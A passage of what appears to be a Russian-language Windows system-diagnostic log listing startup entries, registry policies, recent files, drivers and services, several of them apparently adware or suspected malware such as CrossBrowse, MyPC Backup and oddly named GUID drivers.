C:\PROGRA~2\MIXVID~1\BROWSE~1.EXE [2015-03-17 169984]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupfolder\C:^Users^Владислав^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^crossbrowse.lnk]
C:\PROGRA~2\CROSSB~1\CROSSB~1\APPLIC~1\CROSSB~1.EXE  []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupfolder\C:^Users^Владислав^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Desktop Mania.lnk]
  []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupfolder\C:^Users^Владислав^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^MyPC Backup.lnk]
C:\PROGRA~2\MYPCBA~1\MYPCBA~1.EXE  []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupfolder\C:^Users^Владислав^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^superoptimizersetup.lnk]
C:\PROGRA~3\{2BBB4~1\SUPERO~1.EXE /startup []

[HKEY_LOCAL_MACHINE\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run]
"gmsd_ru_116"= []

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"=" "

[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\securityproviders]
"SecurityProviders"=credssp.dll

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\AFD]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\OptimizerMonitor]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=0
"ConsentPromptBehaviorUser"=3
"EnableLUA"=0
"EnableUIADesktopToggle"=0
"PromptOnSecureDesktop"=0
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoDriveTypeAutoRun"=145

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoActiveDesktop"=1
"NoActiveDesktopChanges"=1
"ForceActiveDesktopOn"=0

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
"vidc.mrle"=msrle32.dll
"vidc.msvc"=msvidc32.dll
"msacm.imaadpcm"=imaadp32.acm
"msacm.msg711"=msg711.acm
"msacm.msgsm610"=msgsm32.acm
"msacm.msadpcm"=msadp32.acm
"midimapper"=midimap.dll
"wavemapper"=msacm32.drv
"VIDC.UYVY"=msyuv.dll
"VIDC.YUY2"=msyuv.dll
"VIDC.YVYU"=msyuv.dll
"VIDC.IYUV"=iyuv_32.dll
"vidc.i420"=iyuv_32.dll
"VIDC.YVU9"=tsbyuv.dll
"msacm.l3acm"=C:\Windows\System32\l3codeca.acm
"wave"=wdmaud.drv
"midi"=wdmaud.drv
"mixer"=wdmaud.drv
"aux"=wdmaud.drv
"wave1"=wdmaud.drv
"midi1"=wdmaud.drv
"mixer1"=wdmaud.drv
"aux1"=wdmaud.drv
"wave2"=wdmaud.drv
"midi2"=wdmaud.drv
"mixer2"=wdmaud.drv
"aux2"=wdmaud.drv
"MSVideo8"=VfWWDM32.dll

======Ассоциации файлов======

.js - edit - C:\Windows\System32\Notepad.exe %1
.js - open - C:\Windows\System32\WScript.exe "%1" %*

======Список файлов и папок, созданных за последние 3 месяца======

2016-04-14 11:26:11 ----D---- C:\AdwCleaner
2016-03-25 14:02:52 ----D---- C:\Windows\SYSWOW64\.launcher_log
2016-03-07 15:11:05 ----ASH---- C:\pagefile.sys
2016-02-24 17:24:16 ----D---- C:\Program Files (x86)\Genie Soft
2016-02-08 15:28:09 ----D---- C:\ProgramData\BlueStacksSetup
2016-01-20 16:02:12 ----D---- C:\Users\Владислав\AppData\Roaming\GetGo Software
2016-01-19 14:49:08 ----D---- C:\Users\Владислав\AppData\Roaming\CentralPicture
2016-01-19 14:48:46 ----D---- C:\Users\Владислав\AppData\Roaming\Calculator
2016-01-19 14:45:39 ----D---- C:\Program Files (x86)\GetGo Software
2016-01-19 14:36:38 ----D---- C:\Users\Владислав\AppData\Roaming\WindowsUpdater
2016-01-18 20:33:56 ----A---- C:\Users\Владислав\AppData\Roaming\daemon2.exe

======Список файлов и папок, измененных за последние 3 месяца======

2016-04-14 11:36:09 ----D---- C:\Program Files (x86)\Opera
2016-04-14 11:31:46 ----D---- C:\Users\Владислав\AppData\Roaming\Skype
2016-04-14 11:31:40 ----D---- C:\Windows\Temp
2016-04-14 11:29:19 ----D---- C:\Windows\system32\Tasks
2016-04-14 11:29:18 ----D---- C:\Windows\Tasks
2016-04-14 11:29:07 ----D---- C:\Windows\SYSWOW64\drivers
2016-04-14 11:29:07 ----D---- C:\Windows\SysWOW64
2016-04-14 11:29:07 ----D---- C:\Windows\system32\drivers
2016-04-14 11:29:07 ----D---- C:\Windows\System32
2016-04-14 11:28:28 ----AHD---- C:\ProgramData
2016-04-14 11:28:27 ----RD---- C:\Program Files (x86)
2016-04-14 11:28:17 ----RD---- C:\Program Files
2016-04-14 10:54:33 ----D---- C:\Windows\Microsoft.NET
2016-04-14 10:48:09 ----SHD---- C:\Config.Msi
2016-04-14 10:47:12 ----SD---- C:\Users\Владислав\AppData\Roaming\Microsoft
2016-04-14 10:46:47 ----D---- C:\Program Files (x86)\Twilight Tech
2016-04-14 10:40:53 ----SHD---- C:\Windows\Installer
2016-04-14 10:40:52 ----RSD---- C:\Windows\assembly
2016-04-14 10:38:25 ----SHD---- C:\System Volume Information
2016-04-14 10:37:32 ----D---- C:\Program Files (x86)\Download Master
2016-04-14 10:36:15 ----D---- C:\Windows\system32\appmgmt
2016-04-14 10:35:29 ----D---- C:\ProgramData\Kaspersky Lab
2016-04-14 10:35:23 ----D---- C:\Windows\system32\DriverStore
2016-04-14 10:35:23 ----D---- C:\Windows\system32\catroot
2016-04-14 10:35:23 ----D---- C:\Windows\inf
2016-04-14 10:35:06 ----D---- C:\Program Files\Common Files\AV
2016-04-14 10:32:47 ----D---- C:\Users\Владислав\AppData\Roaming\Yandex
2016-04-14 10:23:51 ----D---- C:\Windows\system32\catroot2
2016-04-14 10:22:37 ----D---- C:\Windows\pss
2016-04-14 09:01:44 ----D---- C:\Windows\Prefetch
2016-04-10 18:36:37 ----A---- C:\Windows\SYSWOW64\FlashPlayerApp.exe
2016-04-10 15:05:30 ----D---- C:\Windows\system32\config
2016-03-14 20:41:17 ----D---- C:\Windows
2016-03-14 16:49:56 ----D---- C:\Windows\Minidump
2016-03-14 16:47:58 ----D---- C:\Windows\Logs
2016-03-13 21:05:30 ----A---- C:\Windows\system32\PerfStringBackup.INI
2016-01-18 18:28:53 ----RD---- C:\Program Files (x86)\Skype

File C:\Windows\system32\winlogon.exe is digitally signed
File C:\Windows\system32\wininit.exe is digitally signed
File C:\Windows\explorer.exe is digitally signed
File C:\Windows\SysWOW64\explorer.exe is digitally signed
File C:\Windows\system32\svchost.exe is digitally signed
File C:\Windows\SysWOW64\svchost.exe is digitally signed
File C:\Windows\system32\services.exe is digitally signed
File C:\Windows\system32\User32.dll is digitally signed
File C:\Windows\SysWOW64\User32.dll is digitally signed
File C:\Windows\system32\userinit.exe is digitally signed
File C:\Windows\SysWOW64\userinit.exe is digitally signed
File C:\Windows\system32\rpcss.dll is digitally signed
File C:\Windows\system32\Drivers\volsnap.sys is digitally signed
======Список драйверов (тип запуска: R=Запущен, S=остановлен, 0=Загрузочный, 1=Системный, 2=Автоматически, 3=Вручную, 4=Отключено)======

R0 iusb3hcs;Драйвер хост-контроллера и коммутатора Intel(R) USB 3.0; C:\Windows\system32\DRIVERS\iusb3hcs.sys [2013-07-18 20464]
R0 pciide;pciide; C:\Windows\system32\drivers\pciide.sys [2009-07-14 12352]
R0 rdyboost;ReadyBoost; C:\Windows\System32\drivers\rdyboost.sys [2010-11-21 213888]
R1 {09c3ffd6-f1a3-4fde-86e1-d448e8559c21}w64;{09c3ffd6-f1a3-4fde-86e1-d448e8559c21}w64; C:\Windows\system32\drivers\{09c3ffd6-f1a3-4fde-86e1-d448e8559c21}w64.sys [2015-03-10 48832]
R1 {1a7531da-31ad-48c5-8d60-be70ecfbab93}w64;{1a7531da-31ad-48c5-8d60-be70ecfbab93}w64; C:\Windows\system32\drivers\{1a7531da-31ad-48c5-8d60-be70ecfbab93}w64.sys [2015-02-24 48832]
R1 {34789ec0-129d-4a2d-b089-9977cdae65db}w64;{34789ec0-129d-4a2d-b089-9977cdae65db}w64; C:\Windows\system32\drivers\{34789ec0-129d-4a2d-b089-9977cdae65db}w64.sys [2015-02-12 48832]
R1 {3560b757-0519-45b3-a215-cfb94afd0821}Gw64;{3560b757-0519-45b3-a215-cfb94afd0821}Gw64; C:\Windows\system32\drivers\{3560b757-0519-45b3-a215-cfb94afd0821}Gw64.sys [2015-02-05 48832]
R1 {4bcd2e21-b225-4bad-81f4-2c4a7013cd87}w64;{4bcd2e21-b225-4bad-81f4-2c4a7013cd87}w64; C:\Windows\system32\drivers\{4bcd2e21-b225-4bad-81f4-2c4a7013cd87}w64.sys [2015-03-04 48832]
R1 {955a1491-962c-4a4d-a25b-ddfc77991b58}w64;{955a1491-962c-4a4d-a25b-ddfc77991b58}w64; C:\Windows\system32\drivers\{955a1491-962c-4a4d-a25b-ddfc77991b58}w64.sys [2015-02-16 48832]
R1 {9d525140-2aa5-4c29-b571-058468248f69}w64;{9d525140-2aa5-4c29-b571-058468248f69}w64; C:\Windows\system32\drivers\{9d525140-2aa5-4c29-b571-058468248f69}w64.sys [2015-02-22 48832]
R1 {bab3007b-75f3-4020-8eee-4c923fdcb91b}w64;{bab3007b-75f3-4020-8eee-4c923fdcb91b}w64; C:\Windows\system32\drivers\{bab3007b-75f3-4020-8eee-4c923fdcb91b}w64.sys [2015-02-28 48832]
R1 {c0915853-fd66-4086-a9ce-b80496d49b3f}w64;{c0915853-fd66-4086-a9ce-b80496d49b3f}w64; C:\Windows\system32\drivers\{c0915853-fd66-4086-a9ce-b80496d49b3f}w64.sys [2015-02-07 48832]
R1 {d487b1e4-59cf-4940-87da-e7c5a283dab7}w64;{d487b1e4-59cf-4940-87da-e7c5a283dab7}w64; C:\Windows\system32\drivers\{d487b1e4-59cf-4940-87da-e7c5a283dab7}w64.sys [2015-03-06 48832]
R1 {e85a0e97-fa40-4dc4-a79e-e1c1cabe72eb}w64;{e85a0e97-fa40-4dc4-a79e-e1c1cabe72eb}w64; C:\Windows\system32\drivers\{e85a0e97-fa40-4dc4-a79e-e1c1cabe72eb}w64.sys [2015-02-18 48832]
R1 bd0001;bd0001; C:\Windows\system32\DRIVERS\bd0001.sys [2014-12-23 181072]
R1 bd0004;bd0004; C:\Windows\system32\DRIVERS\bd0004.sys [2014-12-23 168776]
R1 BDMWrench;BDMWrench; C:\Windows\system32\DRIVERS\BDMWrench.sys [2014-12-23 130888]
R1 CSC;@%systemroot%\system32\cscsvc.dll,-202; C:\Windows\system32\drivers\csc.sys [2010-11-21 514560]
R2 BDArKit;BDArKit; C:\Windows\system32\DRIVERS\BDArKit.sys [2014-12-26 152392]
R3 amdkmdag;amdkmdag; C:\Windows\system32\DRIVERS\atikmdag.sys [2013-09-12 12760576]
R3 amdkmdap;amdkmdap; C:\Windows\system32\DRIVERS\atikmpag.sys [2013-09-12 619008]
R3 L1C;NDIS Miniport Driver for Qualcomm Atheros AR81xx PCI-E Ethernet Controller; C:\Windows\system32\DRIVERS\L1C62x64.sys [2013-07-18 129224]
S1 bd0002;bd0002; C:\Windows\system32\DRIVERS\bd0002.sys []
S1 BDEnhanceBoost;BDEnhanceBoost; C:\Windows\system32\drivers\BDEnhanceBoost.sys []
S1 BDMWrench_x64;BDMWrench_x64; C:\Windows\system32\DRIVERS\BDMWrench_x64.sys []
S2 BDMNetMon;BDMNetMon; C:\Windows\system32\DRIVERS\BDMNetMon.sys []
S3 cpuz134;cpuz134; \??\C:\Users\4918~1\AppData\Local\Temp\cpuz134\cpuz134_x64.sys []
S3 dmvsc;dmvsc; C:\Windows\system32\drivers\dmvsc.sys [2010-11-21 71168]
S3 FairplayKD;FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys []
S3 RDPDR;Terminal Server Device Redirector Driver; C:\Windows\System32\drivers\rdpdr.sys [2010-11-21 165888]
S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver; C:\Windows\System32\drivers\rdpvideominiport.sys [2010-11-21 20992]
S3 s3cap;s3cap; C:\Windows\system32\drivers\vms3cap.sys [2010-11-21 6656]
S3 storvsc;storvsc; C:\Windows\system32\drivers\storvsc.sys [2010-11-21 34688]
S3 Synth3dVsc;Synth3dVsc; C:\Windows\System32\drivers\synth3dvsc.sys [2010-11-21 88960]
S3 terminpt;Microsoft Remote Desktop Input Driver; C:\Windows\system32\drivers\terminpt.sys [2010-11-21 34816]
S3 TsUsbFlt;TsUsbFlt; C:\Windows\system32\drivers\tsusbflt.sys [2010-11-21 59392]
S3 TsUsbGD;Remote Desktop Generic USB Device; C:\Windows\system32\drivers\TsUsbGD.sys [2010-11-21 31232]
S3 tsusbhub;@%SystemRoot%\system32\drivers\tsusbhub.sys,-1; C:\Windows\system32\drivers\tsusbhub.sys [2010-11-21 117248]
S3 usb_rndisx;Адаптер USB RNDIS; C:\Windows\system32\DRIVERS\usb8023x.sys [2013-02-12 19968]
S3 VGPU;VGPU; C:\Windows\System32\drivers\rdvgkmd.sys []
S3 vmbus;vmbus; C:\Windows\system32\drivers\vmbus.sys [2010-11-21 199552]
S3 VMBusHID;VMBusHID; C:\Windows\system32\drivers\VMBusHID.sys [2010-11-21 21760]
S3 WinUsb;WinUsb; C:\Windows\system32\DRIVERS\WinUsb.sys [2010-11-21 41984]

======Список служб (тип запуска: R=Запущена, S=остановлена, 0=Загрузочная, 1=Системная, 2=Автоматически, 3=Вручную, 4=Отключено)======

R2 AMD External Events Utility;AMD External Events Utility; C:\Windows\system32\atiesrxx.exe [2013-09-12 239616]
R2 BDSGRTP;BDSGRTP Service; C:\Program Files (x86)\Common Files\Baidu\BaiduProtect1.3\1.3.0.602\BaiduProtect.exe [2014-12-23 1923688]
R2 c2cautoupdatesvc;Skype Click to Call Updater; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [2016-01-08 1433216]
R2 c2cpnrsvc;Skype Click to Call PNR Service; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [2016-01-08 1773696]
R2 CscService;@%systemroot%\system32\cscsvc.dll,-200; %SystemRoot%\System32\svchost.exe -k LocalSystemNetworkRestricted;"ServiceDll"=%SystemRoot%\System32\cscsvc.dll
R2 Local Policy Client;Local Policy Client; C:\Windows\SysWOW64\lpclient.exe [2013-08-02 308224]
R2 MDM;Machine Debug Manager; C:\Program Files (x86)\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE [2003-06-20 322120]
R2 MSLSService;MSLSService; C:\Program Files (x86)\Media Saver\Basement\MSLSService.exe [2015-01-13 76296]
R2 PnkBstrA;PnkBstrA; C:\Windows\syswow64\PnkBstrA.exe [2014-03-06 75136]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86; C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2010-03-18 130384]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2010-03-18 138576]
S2 d3dadapter;3D Graphic adapter for video card; %SystemRoot%\System32\svchost.exe -k netsvcs;"ServiceDll"=%SystemRoot%\System32\d3dadapter.dll
S2 gupdate;Служба Google Update (gupdate); C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /svc []
S2 ihctrl32;Intel(R) Host Controller Interface (non-volatile memory); %SystemRoot%\System32\svchost.exe -k Intel(R);"ServiceDll"=%SystemRoot%\System32\ihctrl32.dll
S2 ir16_32;Intel Indeo(N) service; %SystemRoot%\System32\svchost.exe -k netsvcs;"ServiceDll"=%SystemRoot%\System32\ir16_32.dll
S2 SkypeUpdate;Skype Updater; C:\Program Files (x86)\Skype\Updater\Updater.exe [2015-07-09 327296]
S2 wlanmgr;Wireless Manager; %SystemRoot%\System32\svchost.exe -k netsvcs;"ServiceDll"=
S2 wsaudio;Windows Audio 5.1 Surround; %SystemRoot%\System32\svchost.exe -k AudioDrv;"ServiceDll"=%SystemRoot%\System32\wsaudio.dll
S3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service; C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-04-10 269504]
S3 AppMgmt;@appmgmts.dll,-3250; %SystemRoot%\system32\svchost.exe -k netsvcs;"ServiceDll"=%SystemRoot%\System32\appmgmts.dll
S3 aspnet_state;ASP.NET State Service; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe [2010-03-18 44376]
S3 gupdatem;Служба Google Update (gupdatem); C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /medsvc []
S3 IEEtwCollectorService;@%SystemRoot%\system32\ieetwcollectorres.dll,-1000; C:\Windows\system32\IEEtwCollector.exe [2013-11-26 111616]
S3 ose;Office Source Engine; C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2003-07-28 89136]
S3 PeerDistSvc;@%SystemRoot%\system32\peerdistsvc.dll,-9000; %SystemRoot%\System32\svchost.exe -k PeerDist;"ServiceDll"=%SystemRoot%\system32\peerdistsvc.dll
S3 UmRdpService;@%SystemRoot%\system32\umrdp.dll,-1000; %SystemRoot%\System32\svchost.exe -k LocalSystemNetworkRestricted;"ServiceDll"=%SystemRoot%\System32\umrdp.dll
S3 WatAdminSvc;@%SystemRoot%\system32\Wat\WatUX.exe,-601; C:\Windows\system32\Wat\WatAdminSvc.exe [2014-01-02 1255736]
S4 NetMsmqActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8195; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2010-03-18 124240]
S4 NetPipeActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8197; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2010-03-18 124240]
S4 NetTcpActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8199; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2010-03-18 124240]

-----------------EOF-----------------
